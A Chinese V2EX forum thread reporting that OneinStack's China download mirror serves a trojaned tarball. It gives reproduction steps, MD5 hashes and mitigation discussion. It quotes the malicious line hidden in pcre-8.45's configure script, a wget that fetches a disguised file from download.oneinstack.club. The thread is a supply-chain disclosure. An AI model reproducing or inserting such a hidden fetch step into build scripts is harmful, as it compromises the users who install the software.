Oneinstack 国内下载源也被挂马

2023-10-06 16:09:17 +08:00
 imhx233

如何复现

(从海外节点下载暂未发现有此问题)

mirrors.oneinstack.com CNAME 到 seo-one-01.xnsksstack.com,这个域名 DNS 为 DNSPod ,国内解析为 CNAME mirrors.oneinstack.com.w.cdngslb.com. 阿里云 CDN(含恶意代码),海外解析为 A 47.251.13.6 阿里云美国单点

# 国内机器或手动指定 mirrors.oneinstack.com.w.cdngslb.com 国内 IP

wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz
tar -xzf oneinstack-full.tar.gz
cd oneinstack/src
tar -xzf pcre-8.45.tar.gz
cd pcre-8.45
grep -r "oneinstack.club" pcre-8.45

结果(pcre-8.45/configure 第 6883 行):

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

验证 MD5:

# 恶意包
md5sum oneinstack-full.tar.gz
3dc788dd9fe0c13e3db1411e53932331  oneinstack-full.tar.gz

#海外节点包(暂未发现有此问题)
aa55626f6ba9eb8cae2f5a3d9c6c9b96  oneinstack-full.tar.gz

国内国外包对比(右边海外左边国内):

6749 次点击
所在节点    分享发现
38 条回复
imhx233
2023-10-06 20:15:52 +08:00
@irainsoft 而且 sourceforge 上的 oneinstack 最近两个月也有更新,没心思验证是不是也有马
imhx233
2023-10-06 20:16:44 +08:00
@MrWhite 7 月以来装的建议都默认不安全
irainsoft
2023-10-06 20:17:12 +08:00
刚刚看了下 oneinstack 的 sourceforge 和 dropbox 镜像地址都被从官网上移除了,看来是居心叵测了

https://sourceforge.net/projects/oneinstack/

sourceforge 源链接是上面这个,几个小时前刚更新过,可惜更早的包找不到了
irainsoft
2023-10-06 20:20:25 +08:00
@imhx233 #20 我目前就是想用 Actions 来做,有两个想法:
1. 做缓存,但这样需要做 hash check ,而且这样子在 repo 里发包可能是 abuse
2. 我更倾向的想法,是爬取到资源后直接生成 redirect 规则,跳转到软件源站点去
imhx233
2023-10-06 20:21:05 +08:00
@irainsoft 我用 GitHub 存了 Dropbox 包: https://github.com/hifocus/CleanInStack ,屏蔽两个域名 hosts 情况下应该是没问题的
imhx233
2023-10-06 20:24:06 +08:00
@irainsoft 其实最基本的应该还是按需安装,比如安装 Nginx ,就拉取 pcre, openssl 什么的编译;感觉还是需要本地缓存(当然大文件可以通过 GitHub Release 基本解决),因为默认最新版本的话保不齐就编译失败了

全程 hash check 经过这些事件感觉是必需品

GitHub Release 海外拉取的速度非常好,而且用来做版本分支加上代码透明,可以从彻底杜绝这样的事情发生,谁不喜欢了 Fork 一份
imhx233
2023-10-06 20:24:55 +08:00
Oneinstack 对我来说最大的价值还是 ./vhost.sh 可以自动生成 nginx config 和搞定 ssl
要不然真的 apt install nginx 就够了
MrWhite
2023-10-06 20:29:49 +08:00
@imhx233 的确,感觉 Oneinstack 是真的好用。。真的可惜了。。
kome
2023-10-06 20:33:54 +08:00
这个一键脚本之前也被挂马过, ![关于 PHP/JAVA 部署工具 OneinStack 供应链投毒事件预警]( https://www.secpulse.com/archives/200488.html), 作者给出的影响时间范围为: 2023-04-25 ~ 2023-05-03 https://github.com/oneinstack/oneinstack/issues/487
nieccyyy
2023-10-07 07:25:40 +08:00
怎么快速检测是否中招?看备案号应该已经卖了…
ncepuzs
2023-10-07 08:36:19 +08:00
应该已经被卖给了 www[.]wdcp[.]net

https://twitter.com/landiantech/status/1709226985334214932

alect
2023-10-07 10:47:55 +08:00
国内公司注册的,是不是可以上报互联网安全中心
angalmini
2023-10-07 11:17:20 +08:00
@imhx233 我也是这个需求,apt 要手写
angalmini
2023-10-07 11:17:48 +08:00
友友们还有相关脚本还未被波及的么?

知道是有一个秋水的,但是那个是 lamp
blackmirror
2023-10-07 15:37:07 +08:00
使用之前版本会有问题吗
laov2
2023-10-07 19:33:46 +08:00
我本地有个老版本,不过不知道是什么时候的,怎么查看具体版本,不知道有没有问题。
Mitsumune
2023-10-07 21:54:52 +08:00
Azure 东京 9 月 25 日下载的文件也被挂马了...
https://imgur.com/a/951UKIg
GTim
2023-10-11 09:21:17 +08:00
@imhx233 这种脚本可以复制他们的放在自己网站上。简单。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/979226

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX